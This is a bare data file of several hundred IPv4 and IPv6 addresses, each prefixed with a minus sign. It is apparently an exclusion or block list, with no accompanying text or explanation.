-142.252.252.32 -139.196.177.40 -103.240.213.81 -218.22.187.244 -82.94.215.153 -37.153.111.36 -54.146.168.126 -119.28.16.11 -111.230.174.178 -54.209.27.249 -23.225.89.246 -43.230.200.24 -103.30.77.219 -178.170.190.10 -198.210.40.109 -185.104.28.157 -146.255.101.37 -64.207.185.174 -123.56.237.238 -216.172.60.142 -202.47.95.215 -43.230.202.177 -66.228.55.176 -61.183.86.6 -109.109.132.206 -82.135.151.33 -195.154.102.9 -156.237.178.144 -139.196.152.45 -219.159.68.2 -58.220.6.69 -47.92.80.24 -172.252.10.109 -133.242.199.148 -188.132.147.26 -198.199.70.58 -144.217.166.159 -23.19.237.31 -141.138.195.203 -5.178.109.210 -108.61.229.176 -204.152.219.224 -178.32.178.37 -103.240.215.75 -104.207.40.165 -66.39.102.95 -104.238.100.137 -203.190.233.68 -176.9.198.185 -212.96.127.227 -93.189.28.133 -153.120.73.28 -51.254.5.199 -97.107.142.6 -104.202.185.246 -185.209.139.27 -198.37.114.218 -146.20.110.242 -185.104.152.98 -149.210.172.238 -120.26.110.26 -194.19.246.87 -195.154.216.105 -223.199.200.249 -69.12.68.44 -172.104.112.121 -188.226.224.239 -2600:3c03::f03c:91ff:fe70:e38f -50.22.189.130 -182.92.180.214 -183.232.69.59 -218.241.154.53 -45.32.150.229 -184.107.55.41 -172.246.220.151 -107.170.224.94 -78.157.216.82 -173.252.200.243 -222.140.19.35 -88.99.245.193 -103.240.202.52 -86.105.207.140 -173.239.30.156 -104.203.82.104 -185.86.210.249 -139.224.68.177 -43.231.129.221 -162.251.180.22 -91.229.23.116 -202.168.148.253 -46.105.228.44 -172.106.187.234 -160.16.58.182 -134.119.160.241 -124.173.116.74 -122.9.235.232 -107.187.41.58 -103.12.51.35 -160.16.124.97 -209.236.114.129 -85.143.174.54 -174.137.164.180 -66.55.156.132 -103.240.215.168 -174.137.161.97 -174.137.128.110 -23.228.73.228 -107.189.161.80 -45.114.94.21 -107.163.113.9 -43.243.248.30 -54.222.203.211 -103.245.167.2 -91.229.23.32 -77.91.238.217 -27.254.152.70 -158.255.238.147 -67.202.114.241 -173.212.227.139 -83.220.168.107 -172.246.220.207 -213.79.2.14 -153.122.115.16 -103.240.212.101 -67.229.58.220 -185.20.12.24 -192.241.236.53 -95.129.41.16 -188.132.147.40 -5.135.58.99 -2a0a:7d80:1:7::100:e8 -103.39.78.106 -173.236.115.126 -59.106.220.223 -198.210.44.69 -192.169.194.192 -216.17.101.155 -45.56.78.221 -185.66.173.224 -198.50.152.77 -188.166.2.105 -109.235.66.81 -85.254.126.91 -54.191.38.122 -217.23.11.153 -74.117.221.14 -192.162.24.9 -113.196.233.160 -39.108.70.35 -45.61.114.33 -204.74.219.133 -172.246.196.204 -52.7.115.213 -31.28.163.244 -142.91.95.102 -142.91.232.103 -103.82.140.70 -103.236.201.35 -103.240.213.106 -43.230.203.126 -172.246.196.133 -58.215.186.143 -189.45.195.107 -2600:3c03::f03c:91ff:fe73:dc4c -216.107.153.182 -212.199.115.250 -122.114.36.152 -23.225.89.215 -67.202.67.252 -188.116.12.236 -86.107.63.133 -122.144.200.6 -182.254.135.105 -35.176.211.225 -221.228.39.252 -106.15.103.62 -218.234.16.150 -202.82.223.214 -152.54.3.235 -173.214.250.175 -208.83.63.211 -69.10.43.43 -139.224.147.75 -142.91.95.77 -27.254.146.99 -61.247.187.102 -185.50.196.131 -158.69.28.13 -178.18.89.204 -139.196.12.211 -185.129.249.76 -198.24.163.251 -172.247.51.211 -107.178.162.117 -103.193.173.56 -2600:3c02::f03c:91ff:fe73:ccbb -188.132.135.64 -104.250.150.116 -43.230.200.249 -191.96.70.159 -139.59.190.24 -101.55.71.19 -108.61.164.162 -79.98.104.30 -66.228.33.62 -158.69.36.10 -121.10.215.36 -192.3.43.114 -103.9.157.164 -54.36.215.241 -67.225.142.87 -216.107.153.243 -67.196.55.160 -119.254.109.184 -176.31.16.45 -42.121.123.129 -192.102.7.194 -192.157.226.123 -109.109.120.212 -88.208.232.14 -88.208.232.14 -23.244.241.47 -123.56.198.252 -103.98.112.251 -2600:3c03::f03c:91ff:fea8:95dd -185.169.40.4 -68.65.120.53 -185.22.60.158 -176.53.68.177 -152.101.159.233 -35.197.94.192 -198.199.75.162 -47.90.34.98 -65.175.104.95 -43.225.54.178 -91.229.23.109 -184.107.164.132 -82.196.3.135 -46.17.101.198 -85.214.237.218 -104.245.102.121 -112.124.33.28 -46.51.246.114 -163.172.227.70 -122.9.229.178 -103.90.137.252 -198.210.48.67 -217.20.130.150 -120.27.226.45 -58.69.23.164 -183.82.112.108 -120.26.111.212 -120.27.153.185 -104.245.102.104 -185.209.139.36 -139.162.10.136 -59.153.61.155 -139.196.208.211 -109.73.168.215 -31.22.112.53 -69.42.92.222 -183.194.106.210 -119.29.252.34 -178.132.0.65 -47.92.31.27 -27.254.146.107 -2a0a:7d80:1:7::105:16a -58.211.37.54 -211.159.187.166 -58.63.60.117 -120.55.119.22 -185.53.130.15 -133.242.61.12 -183.148.164.80 -153.121.40.37 -98.124.177.158 -23.226.231.115 -120.27.41.246 -172.246.220.227 -193.87.120.253 -156.235.170.10 -186.233.190.67 -112.163.151.190 -62.210.140.215 -43.230.201.180 -208.167.252.9 -103.215.49.204 -188.165.34.40 -170.84.16.3 -146.185.165.243 -43.230.202.21 -66.254.178.23 -192.99.78.140 -163.172.121.22 -115.159.224.142 -23.224.115.111 -45.79.170.96 -219.94.223.233 -209.222.20.154 -142.54.177.237 -8.36.44.134 -221.6.196.118 -95.211.189.77 -104.221.129.107 -112.78.1.98 -174.137.164.189 -91.108.26.179 -5.135.115.25 -107.178.150.92 -82.135.151.242 -211.149.200.4 -72.14.188.63 -122.9.163.233 -123.59.1.85 -119.122.215.200 -211.150.77.122 -117.27.151.226 -2400:6180:0:d0::29b:b001 -138.68.46.112 -120.78.227.22 -43.230.200.132 -216.106.96.74 -138.197.7.178 -174.137.164.132 -103.198.45.5 -60.208.247.78 -104.202.185.195 -104.245.102.27 -173.199.144.92 -188.213.22.155 -2a0a:7d80:1:7::97:46 -77.235.54.104 -43.229.152.34 -109.235.67.215 -67.205.181.7 -128.199.33.157 -103.240.214.138 -194.145.208.149 -182.16.92.132 -195.2.252.212 -112.74.40.81 -107.163.113.44 -104.236.20.75 -205.147.98.63 -217.61.130.146 -190.85.9.221 -185.12.111.137 -149.56.194.138 -185.50.198.128 -58.211.249.163 -62.129.139.94 -120.76.96.42 -89.163.224.194 -201.20.37.61 -45.114.94.249 -66.207.43.231 -23.110.56.67 -132.148.139.183 -46.101.177.15 -58.221.67.22 -82.195.232.70 -163.44.173.50 -176.31.227.141 -54.89.190.89 -120.25.236.64 -172.104.169.133 -93.115.31.49 -144.168.69.147 -122.114.43.100 -104.203.82.79 -23.110.47.209 -162.252.85.84 -89.248.171.160 -92.43.114.248 -50.97.230.60 -184.107.219.75 -217.23.11.157 -45.77.36.147 -192.232.196.76 -107.163.113.77 -119.29.161.60 -43.241.56.64 -159.89.207.71 -80.84.230.32 -45.249.94.70 -134.119.132.111 -104.202.185.117 -85.214.38.149 -160.16.111.67 -2400:8901::f03c:91ff:fea8:eb69 -103.193.240.68 -37.252.96.171 -112.78.10.120 -119.27.168.172 -5.145.174.100 -153.122.12.103 -218.108.69.45 -144.217.19.237 -45.114.118.171 -203.83.178.236 -185.50.198.226 -173.208.194.242 -218.244.128.215 -103.56.63.52 -23.250.123.108 -142.91.241.120 -178.33.15.93 -194.44.94.25 -45.252.248.236 -2a0a:7d80:1:7::103:128 -23.229.61.227 -109.163.208.73 -75.126.58.134 -91.121.66.49 -195.50.2.198 -94.46.164.5 -156.235.169.18 -107.163.113.230 -64.15.146.132 -31.3.103.240 -5.153.48.244 -218.232.75.192 -77.75.98.7 -104.221.169.12 -114.55.42.152 -45.79.213.19 -209.200.13.201 -64.237.35.213 -158.69.181.15 -104.232.102.148 -103.9.251.12 -222.73.51.238 -107.161.177.146 -101.226.197.232 -5.135.118.235 -222.23.86.151 -111.202.15.23 -103.23.154.177 -120.132.16.199 -114.55.92.45 -173.0.63.168 -176.31.16.55 -149.56.145.212 -75.101.149.226 -103.237.143.105 -23.19.22.14 -45.125.239.188 -203.209.147.136 -199.247.2.42 -124.207.213.214 -216.107.153.171 -49.212.178.82 -160.16.117.203 -67.222.143.251 -182.163.74.20 -5.45.77.172 -78.188.17.163 -91.215.224.135 -103.240.213.37 -5.135.203.166 -199.167.40.81 -91.229.113.68 -120.55.160.37 -112.126.82.150 -45.77.0.251 -107.164.66.197 -61.145.122.250 -176.31.154.126 -192.99.78.131 -54.89.190.208 -188.132.147.32 -88.150.157.230 -104.223.19.5 -27.254.146.121 -210.38.137.100 -23.89.176.189 -201.158.32.33 -120.132.38.2 -203.131.196.89 -83.142.155.179 -159.203.113.134 -64.237.48.169 -5.196.101.68 -200.24.90.4 -172.246.196.225 -185.8.106.178 -86.127.82.112 -65.60.46.152 -5.178.109.158 -39.106.73.250 -101.236.26.13 -185.97.165.247 -95.66.188.3 -89.41.178.17 -185.28.38.42 -205.147.99.197 -195.211.154.203 -5.196.96.34 -212.42.201.235 -192.99.204.179 -208.110.80.27 -198.24.162.155 -2a0a:7d80:1:7::102:1ed -119.23.73.116 -5.255.80.61 -210.158.217.233 -5.145.174.205 -23.104.135.90 -112.121.174.123 -120.24.54.11 -120.24.156.174 -104.203.82.39 -2a0a:7d80:1:7::97:252 -122.9.29.244 -119.29.11.170 -185.13.58.8 -108.60.222.133 -178.62.160.86 -103.242.106.115 -217.150.94.67 -5.79.80.73 -103.240.214.49 -103.240.215.83 -186.103.228.204 -58.229.212.13 -94.23.116.121 -172.107.64.14 -203.206.203.64 -217.150.94.86 -46.101.118.164 -103.200.32.145 -23.227.129.18 -150.95.174.54 -5.135.224.50 -123.207.18.185 -49.212.25.153 -109.239.51.6 -103.23.42.200 -220.247.160.124 -103.41.125.17 -121.42.230.107 -85.31.177.238 -47.104.98.180 -82.208.48.241 -103.240.212.207 -66.34.181.225 -209.182.213.247 -91.229.23.79 -43.230.202.148 -103.240.214.10 -108.61.158.32 -117.149.36.208 -185.85.191.136 -182.92.224.107 -5.45.72.21 -103.205.2.105 -45.63.0.38 -212.63.206.36 -37.61.235.110 -213.253.113.211 -193.226.35.199 -125.212.221.36 -54.227.142.27 -137.74.154.65 -192.210.205.74 -5.45.74.164 -104.236.87.16 -164.70.8.153 -111.202.15.12 -124.81.246.150 -46.101.152.192 -172.106.186.53 -104.203.82.160 -158.69.36.17 -216.107.153.147 -149.56.147.40 -156.235.170.23 -204.44.79.252 -128.14.85.156 -218.63.205.157 -50.56.87.134 -178.33.118.50 -103.98.112.250 -178.238.229.159 -202.115.54.23 -80.233.244.35 -104.203.82.45 -187.157.189.152 -115.125.176.131 -163.44.165.106 -101.251.219.170 -153.126.187.114 -173.212.250.109 -95.211.185.244 -188.121.61.97 -49.212.234.203 -62.63.190.58 -212.47.233.32 -59.106.213.192 -121.42.247.223 -120.77.240.189 -104.250.136.12 -50.23.78.151 -216.107.153.190 -118.89.44.116 -41.57.124.36 -5.45.79.240 -120.24.54.180 -120.27.46.227 -52.234.228.224 -65.182.110.114 -1.255.109.156 -111.231.105.150 -38.64.38.99 -60.216.7.236 -185.71.65.6 -61.135.199.212 -202.181.132.179 -125.212.211.65 -151.9.35.81 -151.9.35.81 -210.75.19.165 -34.250.158.148 -153.126.194.47 -202.49.89.6 -133.130.103.62 -95.183.3.51 -209.200.18.245 -103.250.94.244 -139.196.178.120 -85.254.126.87 -217.171.28.5 -62.63.190.60 -122.112.4.20 -204.11.236.222 -178.32.42.3 -47.104.194.209 -52.90.236.77 -61.63.20.66 -107.191.118.169 -91.229.23.123 -23.238.176.233 -108.61.119.93 -115.126.23.200 -146.71.99.167 -5.178.109.206 -109.239.62.102 -91.221.207.14 -160.16.230.96 -220.195.2.152 -109.206.168.138 -101.251.215.217 -46.232.178.145 -141.138.195.61 -64.237.48.167 -125.63.64.20 -66.39.80.223 -103.205.2.69 -185.82.223.72 -41.188.155.21 -222.122.49.68 -103.240.215.133 -76.74.184.40 -95.168.204.239 -95.213.169.145 -211.159.186.25 -64.22.68.31 -172.107.64.55 -192.154.97.75 -124.173.117.236 -199.201.88.8 -79.142.57.214 -115.47.123.8 -72.4.126.134 -172.247.51.81 -216.224.117.132 -181.215.238.217 -185.4.227.119 -63.142.254.47 -213.52.130.67 -85.254.126.47 -2400:8901::f03c:91ff:fea8:fe11 -23.225.89.157 -219.128.79.222 -153.122.75.75 -91.134.197.165 -82.208.7.52 -123.57.221.136 -50.116.30.205 -104.245.102.95 -188.226.206.17 -123.57.41.84 -172.246.220.6 -2a0a:7d80:1:7::95:308 -115.125.176.218 -198.200.41.28 -2400:8901::f03c:91ff:fea8:550f -96.31.67.47 -2a0a:7d80:1:7::101:3 -114.215.204.193 -205.147.98.246 -104.232.102.134 -216.224.117.247 -104.238.177.8 -120.25.224.166 -185.28.36.116 -91.198.105.125 -45.55.21.153 -52.74.59.16 -156.237.176.202 -120.77.61.82 -199.182.169.198 -5.189.149.236 -159.203.60.155 -93.115.31.76 -163.44.173.82 -61.166.13.142 -120.26.70.79 -179.61.225.244 -199.229.255.125 -125.212.225.137 -192.166.218.79 -58.221.92.42 -72.10.33.144 -136.144.137.193 -212.68.61.92 -198.176.55.15 -5.160.219.9 -118.89.65.223 -160.16.69.77 -5.39.25.62 -139.59.49.244 -103.37.85.53 -45.55.241.13 -31.186.101.123 -50.116.45.59 -101.200.195.184 -111.202.15.15 -2a0a:7d80:1:7::95:183 -23.88.82.33 -104.221.169.9 -150.95.142.66 -103.10.191.194 -173.252.225.2 -192.121.196.242 -209.200.43.172 -5.61.37.5 -202.171.225.103 -37.59.76.60 -13.229.200.102 -5.178.109.77 -173.192.129.7 -183.26.171.140 -51.15.36.38 -138.201.203.150 -58.84.55.239 -91.232.12.76 -27.254.146.5 -153.121.48.240 -46.101.83.189 -142.91.241.72 -211.139.251.73 -162.243.70.51 -163.172.16.133 -103.240.212.102 -80.73.133.243 -153.126.135.61 -206.190.150.178 -185.56.235.196 -172.246.196.29 -66.228.40.67 -45.41.92.142 -23.229.227.162 -116.236.231.175 -139.5.211.28 -130.192.157.26 -202.150.132.119 -58.241.133.248 -139.59.230.5 -150.95.130.137 -46.101.104.159 -134.119.63.90 -185.38.45.114 -69.50.209.196 -122.252.253.8 -156.237.179.104 -185.86.210.26 -123.30.208.87 -74.50.53.52 -95.163.105.91 -203.113.4.73 -174.37.242.42 -2a0a:7d80:1:9::99:322 -65.17.128.139 -43.230.201.3 -107.154.51.97 -103.100.157.69 -110.170.212.183 -94.23.116.124 -120.25.240.24 -91.134.170.113 -45.125.236.116 -103.48.82.120 -151.80.102.62 -183.230.71.52 -188.40.43.118 -163.25.104.53 -182.61.13.143 -192.175.105.61 -43.230.201.116 -185.122.140.72 -103.240.212.252 -116.62.38.87 -80.14.177.145 -107.179.98.105 -116.62.196.30 -23.225.0.206 -208.94.236.117 -194.110.64.131 -115.218.194.12 -119.123.77.115 -107.6.168.130 -117.27.152.206 -118.244.228.145 -121.40.46.109 -106.75.104.58 -103.205.3.109 -192.99.78.133 -47.96.249.203 -5.45.66.241 -185.10.99.34 -104.237.53.132 -77.75.98.6 -103.240.212.41 -104.242.12.170 -95.211.10.246 -192.40.58.16 -183.246.71.167 -2a0a:7d80:1:7::100:112 -208.82.19.208 -49.212.234.48 -45.124.85.239 -98.124.176.212 -185.95.3.155 -188.93.22.222 -103.238.226.130 -107.170.194.57 -115.29.164.119 -74.95.1.252 -74.221.217.4 -120.78.79.140 -46.254.16.66 -5.178.109.9 -178.173.0.10 -96.125.135.16 -156.235.169.178 -23.19.238.48 -150.95.140.149 -104.203.82.26 -202.40.176.101 -139.159.231.111 -137.175.50.18 -103.37.163.159 -142.4.119.77 -157.252.245.36 -103.53.168.250 -176.31.16.50 -192.133.45.202 -159.89.238.238 -2a0a:7d80:1:7::102:67 -103.240.214.198 -62.63.190.69 -103.240.212.36 -67.215.14.115 -107.187.41.106 -152.160.212.60 -46.101.134.141 -88.150.157.231 -85.254.126.82 -104.250.150.189 -178.255.41.174 -172.107.71.23 -208.43.57.203 -103.240.214.219 -5.135.190.63 -125.63.72.14 -124.158.4.76 -192.241.195.16 -62.63.191.16 -121.40.228.130 -43.230.200.72 -159.253.33.199 -125.62.36.120 -107.170.39.152 -77.109.150.102 -45.77.39.230 -31.31.199.218 -103.205.2.119 -79.98.108.149 -155.94.69.215 -192.169.193.180 -2a0a:7d80:1:7::93:17b -2a0a:7d80:1:7::100:358 -64.118.90.230 -69.16.215.212 -160.79.129.3 -45.64.168.31 -156.67.220.132 -122.252.238.25 -104.148.75.211 -91.184.8.15 -176.107.248.10 -172.107.73.207 -80.231.171.109 -208.83.62.20 -203.113.66.193 -139.162.52.174 -208.86.0.68 -82.146.226.167 -79.98.26.221 -107.163.113.88 -103.233.8.32 -162.220.16.189 -209.151.166.237 -43.230.200.145 -45.41.92.152 -199.87.238.156 -222.255.168.88 -123.57.38.128 -172.106.184.13 -122.227.160.108 -218.100.84.53 -162.247.68.17 -98.126.92.52 -216.155.154.164 -202.91.236.183 -185.80.233.220 -198.128.151.25 -136.142.202.57 -103.239.242.35 -103.240.213.211 -104.199.36.83 -120.132.122.74 -172.246.196.164 -216.224.117.55 -43.225.110.55 -119.254.114.99 -120.27.20.105 -89.105.211.20 -103.90.137.159 -5.178.109.30 -115.125.176.72 -98.124.176.196 -104.232.75.146 -172.247.51.150 -158.69.156.182 -107.178.150.121 -199.101.134.200 -192.163.253.223 -47.92.77.225 -23.110.47.248 -159.65.184.171 -41.202.162.55 -37.26.160.159 -64.59.80.194 -27.254.146.7 -94.231.110.215 -49.212.63.225 -176.34.132.179 -176.31.220.85 -91.230.236.71 -114.55.10.46 -91.142.212.124 -85.24.136.219 -31.186.25.66 -118.178.186.167 -82.146.54.23 -162.245.229.6 -128.1.182.149 -120.26.131.60 -139.162.216.178 -123.1.151.51 -172.247.51.186 -170.231.100.199 -158.69.94.205 -172.107.75.237 -78.192.200.45 -203.156.127.182 -202.40.188.20 -45.32.229.38 -198.199.85.15 -173.199.116.22 -45.33.2.38 -43.225.110.51 -120.55.91.82 -198.200.41.23 -192.210.192.186 -23.225.239.55 -45.125.236.92 -51.254.31.17 -103.209.98.21 -172.247.250.229 -67.227.152.9 -79.174.65.74 -216.158.235.7 -103.74.121.163 -104.202.185.132 -219.91.153.122 -114.215.141.79 -216.224.117.143 -66.228.40.140 -146.185.150.167 -173.239.7.109 -103.205.3.103 -185.122.140.50 -51.254.156.60 -107.178.150.95 -95.85.62.202 -111.206.164.20 -194.231.246.132 -194.231.246.132 -184.173.77.24 -138.68.7.78 -103.10.189.216 -51.255.127.220 -156.237.178.147 -160.16.197.67 -104.251.224.104 -216.70.113.74 -74.206.240.101 -67.205.134.193 -103.193.242.44 -64.6.104.222 -200.11.218.78 -43.229.134.240 -5.178.109.141 -103.208.33.236 -212.24.99.27 -67.215.233.35 -172.247.51.23 -218.61.76.24 -104.203.82.158 -115.194.120.124 -72.52.171.98 -69.65.50.70 -91.121.42.114 -139.196.13.204 -103.229.72.235 -119.9.55.99 -153.120.83.76 -82.103.143.76 -122.114.55.221 -112.74.97.231 -13.58.134.238 -87.106.106.49 -167.114.101.222 -51.254.5.219 -1.199.68.120 -87.81.176.67 -104.245.102.46 -184.107.164.58 -165.227.108.57 -58.84.55.168 -188.92.246.80 -153.120.73.30 -47.92.141.45 -79.98.28.118 -172.247.51.184 -125.212.224.48 -50.97.179.234 -162.251.110.160 -103.1.173.190 -67.214.183.154 -217.115.137.192 -122.13.163.141 -115.125.176.115 -46.41.130.224 -2a0a:7d80:1:7::106:139 -188.166.53.243 -89.208.156.205 -144.48.220.54 -121.42.188.28 -173.212.231.40 -101.231.72.111 -141.138.193.199 -218.27.37.125 -143.208.58.83 -185.177.153.251 -64.20.33.210 -118.89.54.80 -133.130.97.197 -72.52.136.74 -91.121.254.203 -93.93.52.248 -23.229.61.226 -216.224.117.111 -68.171.211.117 -217.18.43.91 -198.98.113.229 -216.224.117.6 -43.230.202.22 -18.231.174.131 -80.249.173.156 -2600:3c00::f03c:91ff:fe56:3011 -103.100.157.223 -204.128.62.221 -188.213.22.152 -2a0a:7d80:1:7::93:27c -2a0a:7d80:1:7::91:39 -43.230.200.75 -88.150.239.162 -156.235.171.38 -82.202.197.80 -47.104.23.93 -185.2.151.88 -162.243.143.249 -107.151.113.214 -109.73.168.240 -133.242.211.219 -104.148.75.210 -118.217.182.93 -64.237.49.132 -103.98.160.5 -121.41.56.47 -23.19.22.13 -122.9.29.226 -107.164.66.179 -93.104.210.223 -2a0a:7d80:1:9::99:124 -149.71.102.5 -87.117.239.106 -43.230.201.150 -184.154.216.38 -93.190.206.129 -153.126.169.67 -163.172.24.72 -45.61.115.30 -128.199.195.164 -107.165.201.2 -123.249.88.235 -122.176.36.85 -198.176.52.22 -173.212.248.194 -58.84.55.174 -222.87.49.92 -172.246.220.79 -43.230.203.181 -139.196.14.200 -150.95.147.213 -192.99.126.218 -120.42.4.92 -115.146.121.225 -106.14.74.155 -139.162.100.89 -104.250.135.4 -211.110.1.24 -104.232.75.136 -158.69.117.120 -169.54.214.75 -39.108.164.1 -23.244.241.71 -210.5.45.71 -185.87.252.33 -173.239.17.251 -80.93.213.194 -120.77.205.153 -188.93.125.118 -149.202.118.177 -217.61.129.144 -39.109.1.109 -104.250.132.235 -118.89.104.136 -14.18.235.207 -37.139.15.132 -74.207.227.174 -205.251.152.103 -176.221.37.70 -198.143.189.203 -93.115.31.54 -103.240.213.167 -198.57.208.200 -64.22.68.21 -107.187.41.164 -103.240.214.139 -114.55.113.41 -43.226.72.239 -149.202.16.153 -115.249.52.243 -96.44.131.147 -103.28.37.62 -104.130.137.109 -23.238.166.139 -93.186.179.97 -213.240.172.49 -34.248.224.65 -84.39.97.183 -202.59.163.99 -103.53.197.101 -109.235.66.53 -23.225.0.91 -67.196.126.224 -82.102.14.24 -142.4.113.200 -198.200.41.69 -66.37.25.180 -172.96.80.197 -107.180.78.223 -54.225.30.219 -192.154.99.250 -108.163.181.179 -173.212.250.107 -2a0a:7d80:1:7::97:1be -108.179.209.231 -120.24.91.35 -5.77.56.83 -153.121.42.161 -185.122.140.27 -188.165.132.172 -182.161.76.183 -101.201.122.196 -153.126.169.41 -94.75.198.104 -222.186.34.139 -195.248.225.63 -78.130.180.65 -150.95.199.27 -185.164.138.225 -163.172.162.195 -120.27.156.184 -125.118.104.23 -74.82.216.10 -67.222.3.163 -119.59.101.111 -122.195.186.188 -178.32.51.95 -203.205.37.205 -67.227.212.109 -118.31.45.189 -121.40.227.176 -104.224.200.243 -23.19.22.20 -185.4.48.119 -64.64.98.34 -139.162.255.217 -85.118.132.10 -119.18.154.203 -198.50.251.1 -172.246.196.156 -103.240.213.39 -144.168.124.11 -121.43.157.63 -104.202.185.19 -45.76.155.129 -80.248.210.149 -121.40.39.48 -103.240.212.139 -60.221.239.170 -145.255.26.62 -220.226.210.86 -51.254.153.97 -103.49.10.235 -112.85.10.78 -216.224.117.34 -42.51.44.250 -80.87.240.49 -85.118.114.119 -183.61.84.34 -216.107.153.202 -173.230.251.178 -45.124.64.132 -172.246.220.251 -107.163.113.195 -45.43.21.30 -1.33.207.100 -23.88.82.64 -216.185.100.202 -144.217.179.5 -23.224.115.171 -133.242.1.203 -122.9.29.242 -217.115.118.17 -139.162.23.115 -27.133.138.197 -54.234.47.66 -185.122.140.25 -107.178.150.68 -121.40.200.231 -164.132.192.232 -23.244.241.66 -104.251.238.131 -192.34.62.17 -72.232.1.6 -197.249.0.224 -128.199.147.239 -193.192.49.130 -121.137.73.50 -58.218.200.248 -14.102.75.228 -74.50.57.192 -93.187.238.96 -107.170.9.59 -139.196.175.63 -103.193.241.148 -160.16.78.35 -52.25.57.215 -54.202.34.80 -119.23.134.103 -103.235.238.72 -216.45.55.235 -103.240.212.65 -5.178.109.197 -91.198.44.120 -120.27.50.51 -118.89.26.133 -122.9.229.150 -203.152.216.75 -185.212.128.22 -212.83.161.105 -2a0a:7d80:1:7::101:196 -157.52.240.91 -212.83.143.128 -212.8.240.10 -98.159.45.106 -104.238.102.80 -172.106.184.53 -51.255.28.55 -159.180.249.106 -220.189.213.254 -103.37.112.154 -185.129.248.90 -54.94.60.216 -184.172.41.106 -54.213.129.206 -66.171.239.190 -209.200.41.221 -79.174.68.178 -103.240.214.214 -23.250.115.116 -77.243.239.82 -79.98.134.246 -205.147.111.225 -5.135.112.228 -45.79.92.105 -23.104.135.234 -223.27.231.166 -23.94.123.244 -107.178.162.92 -120.25.98.185 -185.181.228.114 -122.9.235.202 -192.169.235.67 -172.106.184.11 -117.135.139.102 -98.159.44.106 -138.197.27.168 -91.206.220.8 -103.80.25.84 -23.225.0.140 -37.221.171.50 -209.188.18.24 -210.211.125.225 -185.182.96.49 -103.35.202.50 -54.249.52.64 -54.238.163.209 -103.198.45.29 -178.33.115.70 -61.178.176.167 -123.56.41.211 -122.225.196.254 -121.40.89.91 -198.50.245.6 -185.50.196.208 -185.14.184.83 -139.162.63.21 -37.46.132.109 -172.107.146.142 -104.130.203.153 -122.152.217.157 -74.208.131.42 -47.100.130.54 -93.183.211.75 -123.206.208.210 -123.49.46.148 -2a0a:7d80:1:7::101:2ce -142.91.95.230 -103.240.215.46 -23.19.202.18 -115.28.186.238 -89.108.121.16 -34.209.35.9 -104.237.154.194 -123.60.202.244 -183.56.148.90 -199.101.134.205 -216.17.107.165 -103.197.57.84 -178.33.223.83 -31.24.157.246 -40.115.251.102 -91.237.108.42 -219.148.111.225 -74.127.45.161 -103.25.202.199 -23.19.202.55 -45.55.39.173 -118.193.219.49 -107.150.28.9 -200.124.241.126 -157.52.240.78 -23.225.0.95 -66.254.163.4 -23.88.142.143 -37.59.180.200 -184.164.76.229 -185.136.205.62 -192.95.3.46 -172.255.173.46 -200.195.183.82 -114.215.29.142 -88.85.233.69 -192.162.100.150 -107.187.41.56 -211.149.237.54 -137.74.33.167 -142.91.241.94 -218.1.109.22 -47.94.104.58 -12.41.72.100 -192.36.17.182 -95.211.189.90 -198.20.106.99 -177.73.69.12 -80.233.244.22 -137.74.17.70 -175.193.117.235 -124.40.255.94 -23.228.73.229 -112.74.75.182 -82.221.129.82 -23.88.82.242 -183.81.161.106 -174.137.155.164 -184.164.139.27 -87.98.159.145 -123.206.177.68 -195.142.133.100 -121.28.95.89 -103.27.203.65 -110.53.49.110 -54.255.151.15 -5.254.88.188 -174.140.163.3 -49.50.67.227 -185.98.63.130 -192.99.63.168 -49.212.193.56 -112.121.163.38 -216.224.117.121 -31.192.208.213 -103.205.96.235 -23.94.27.121 -23.225.239.91 -173.193.126.43 -115.71.236.215 -101.251.111.132 -66.55.156.142 -138.201.206.60 -51.254.153.102 -45.76.223.160 -207.58.177.63 -192.81.249.191 -121.43.158.203 -51.255.115.91 -115.125.176.137 -120.25.161.254 -46.253.126.132 -199.119.137.178 -82.196.6.101 -103.75.188.70 -123.57.27.137 -103.193.242.114 -79.137.45.6 -120.79.0.172 -172.246.220.225 -179.184.229.164 -49.212.21.74 -164.138.217.247 -192.165.106.222 -196.203.63.172 -74.201.40.172 -2a00:1158:400:407::4ad -188.166.176.73 -176.124.231.34 -195.128.49.156 -192.241.120.22 -85.118.232.130 -87.252.5.66 -61.184.82.11 -124.205.151.90 -156.237.177.180 -64.6.101.136 -112.74.97.35 -91.235.129.71 -142.91.241.87 -2a0a:7d80:1:7::105:116 -34.204.48.71 -172.247.51.125 -54.197.237.9 -199.167.129.90 -160.16.69.81 -93.170.141.238 -85.95.239.182 -5.178.109.252 -104.232.102.188 -45.55.114.47 -149.62.173.150 -23.230.224.234 -60.29.182.135 -31.179.223.56 -185.50.196.141 -121.78.196.153 -204.44.79.63 -103.100.157.186 -185.10.99.43 -103.37.235.221 -62.109.10.228 -38.126.72.6 -185.95.3.156 -103.200.16.14 -95.169.190.100 -212.83.128.108 -144.217.162.232 -195.8.206.130 -184.107.181.238 -104.203.82.131 -203.175.160.124 -218.32.216.88 -188.93.94.114 -185.65.201.177 -74.86.236.81 -91.224.194.44 -120.76.53.50 -203.121.4.73 -45.76.191.63 -136.0.69.215 -107.191.40.47 -111.118.176.223 -185.211.244.135 -117.54.124.45 -96.8.127.73 -156.237.176.197 -124.95.131.29 -204.16.201.28 -217.182.235.35 -217.150.94.74 -69.4.87.54 -5.188.64.90 -158.69.26.17 -198.178.122.117 -5.145.175.69 -109.163.208.130 -37.34.49.14 -209.208.110.20 -172.246.220.101 -74.206.240.106 -160.19.213.162 -209.200.43.166 -114.247.234.145 -119.23.23.26 -104.202.185.248 -91.215.154.135 -64.207.176.20 -122.9.15.43 -45.114.94.90 -98.143.144.119 -23.225.0.192 -103.100.157.114 -153.126.143.124 -104.131.240.85 -95.211.160.167 -118.67.104.145 -80.84.230.30 -194.224.194.34 -69.164.195.187 -221.234.46.9 -114.215.120.78 -103.208.35.63 -116.9.75.59 -171.244.8.148 -50.115.130.172 -172.107.73.251 -172.246.220.90 -208.99.86.128 -144.217.240.138 -104.202.185.207 -122.9.18.136 -153.120.50.200 -210.65.151.139 -103.239.242.26 -62.63.191.37 -144.217.212.33 -142.4.119.111 -110.136.63.54 -45.35.102.142 -69.42.94.62 -217.18.43.183 -194.165.33.223 -103.35.203.35 -120.76.204.115 -173.236.78.68 -80.209.232.172 -23.244.69.124 -98.143.37.24 -103.28.206.77 -190.0.6.211 -178.62.25.67 -133.242.182.77 -211.101.11.152 -107.178.150.84 -62.76.179.20 -2a0a:7d80:1:7::91:1c2 -62.213.100.190 -187.95.189.241 -165.227.67.215 -184.107.132.134 -184.107.252.101 -108.170.62.174 -91.142.222.18 